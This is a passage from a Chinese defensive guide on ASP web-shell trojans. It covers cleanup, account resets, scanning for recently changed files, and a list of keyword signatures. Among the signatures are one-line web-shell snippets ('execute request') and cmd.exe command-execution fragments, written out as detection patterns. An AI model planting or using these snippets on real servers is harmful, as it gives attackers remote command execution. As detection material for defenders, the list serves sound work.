ASP木马的原理和基本防范方法(2)

　　另外有一点应该注意，如果确实发现木马了，查杀完之后，应该将具有管理权限的各类帐号都进行修改。包括论坛的帐号、数据库帐号以及服务器操作系统帐号、FTP帐号等，如果我们做到了这个几点话，我们的服务器基本上是安全了，呵呵，为什么说是基本的呢，因为这个世界上根本就没有安全的服务器了，只不过我们刚才说到的设置只是能够防范大部分asp木马的的侵害，不排除一些别的因素，比如说提限。说白了防范asp木马就是要限制组件，设置严格的权限和保证asp程序的安全

　　1. 时间比较法

　　按时间顺序找到最近被改动的asp文件 ，打开看下，是不是木马呢，什么，看不懂代码, 那你就把不是你自己放的asp文件，名字看一眼就看的出的。比如说diy.ap.dm6.asp,angel.asp.shell.asp什么的文件，可疑的asp文件不是你自己创建的删除，或直接访问下看下是不是木马就可以了

　　2. 查找关键字，asp木马都是有关键字的，也就像病毒的特征码，我们用windows自带的搜索功能就能查找到 ，查找包含内容为关键字的所有文件就可以了，找到以后看下就可以了，有时候能查找到一些asp的大文件，如果是虚拟主机的话，一般是数据库文件改成asp的了，如果是一句话木马的关键字就小心了，如果是大型木马的关键字，咱们访问一下看看，我不赞成把数据库改成asp的，至于为什么，大家都知道吧。

　　我整理了一些特征码，现在给大家

　　gxgl

　　lcx

　　输入马的内容

　　session("b")

　　request("kker")

　　非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序

　　传至服务器已有虚拟目录

　　警告:对非法使用此程序可能带来的任何不良后果责任自负!请勿用于非法用途!!!

　　<%execute request("value")%>

　　ccopus<

　　<%execute(request("＃"))%>

　　("cmd.exe /c "&request.form("cmd")).

　　("cmd.exe /c "&request("cmd")).

　　("cmd.exe /c "&request("c")).

　　这些都是关键字了，全部是我从木马里面一个一个提取出来的，如果有这些特征的话，一般都是木马 ，不过大家最好打开看一下,不排除特殊情况。如果你的网站里，有类似代码：<iframe src="http://www.***.com" ></iframe> 估计可能是被加入的恶意连接，或着被挂马了，好狠毒，那么请在关键词中搜索iframe src，